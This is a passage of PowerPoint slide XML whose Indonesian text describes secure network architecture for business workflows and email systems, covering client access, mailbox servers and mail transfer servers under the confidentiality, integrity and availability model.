              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> toko web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ingatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsekuensinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>surat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>surat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Server transfer email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host Internet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan LAN yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunduk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
